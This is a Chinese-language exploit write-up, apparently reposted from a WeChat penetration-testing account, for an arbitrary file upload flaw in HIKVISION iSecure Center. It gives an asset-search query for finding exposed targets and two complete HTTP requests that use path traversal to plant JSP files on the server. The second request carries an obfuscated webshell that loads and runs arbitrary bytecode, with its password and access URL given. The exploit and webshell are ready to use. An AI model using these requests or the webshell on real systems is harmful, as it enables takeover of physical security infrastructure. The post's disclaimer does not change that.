1、漏洞描述
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞
2、影响版本
HIKVISION iSecure Center综合安防管理平台
3、资产测绘
app="HIKVISION-iSecure-Center"4、漏洞复现
POST /center/api/files;.js HTTP/1.1Host: 172.16.127.250User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 249Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c--ea26cdac4990498b32d7a95ce5a5135cContent-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/test.jsp"Content-Type: application/octet-streamtest--ea26cdac4990498b32d7a95ce5a5135c--
上传文件位置:http://xx.xx.xx.xx/clusterMgr/test.jsp;.js
EXP|蚁剑密码:admin
POST/center/api/files;.js HTTP/1.1Host: 172.16.127.250User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 1187Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c--ea26cdac4990498b32d7a95ce5a5135cContent-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/shell1.jsp"Content-Type: application/octet-stream<%StringHZ6XV= request.getParameter("admin");if (HZ6XV!= null) { classE74vekliextends/*Z5WGL66IkB*/ClassLoader { E74vekli(ClassLoaderL902G8) { super(L902G8); } publicClassHZ6XV(byte[] b) { returnsuper.defineClass(b, 0, b.length);}}byte[] bytes = null;try {int[] aa = newint[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98}; Stringccstr="";for (inti=0; i < aa.length; i++) {aa[i] = aa[i] ^0x010; ccstr = ccstr + (char) aa[i];}ClassA16iI=Class.forName(ccstr);Stringk=newString(newbyte[]{100,101,99,111,100,101,66,117,102,102,101,114});bytes = (byte[]) A16iI.getMethod(k, String.class).invoke(A16iI.newInstance(), HZ6XV);}catch (Exception e) {bytes = javax.xml.bind.DatatypeConverter.parseBase64Binary(HZ6XV);}ClassaClass=newE74vekli(Thread.currentThread().getContextClassLoader()).HZ6XV(bytes);Objecto= aClass.newInstance();o.equals(pageContext);} else {} %>--ea26cdac4990498b32d7a95ce5a5135c--
上传文件位置:http://xx.xx.xx.xx/clusterMgr/shell1.jsp;.js
记得点赞+关注,关注微信公众号菜鸟学渗透获取最新文章,有任何问题可以后台私信我
有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。
原文始发于微信公众号(菜鸟学渗透):海康威视iSecure Center综合安防管理平台center任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论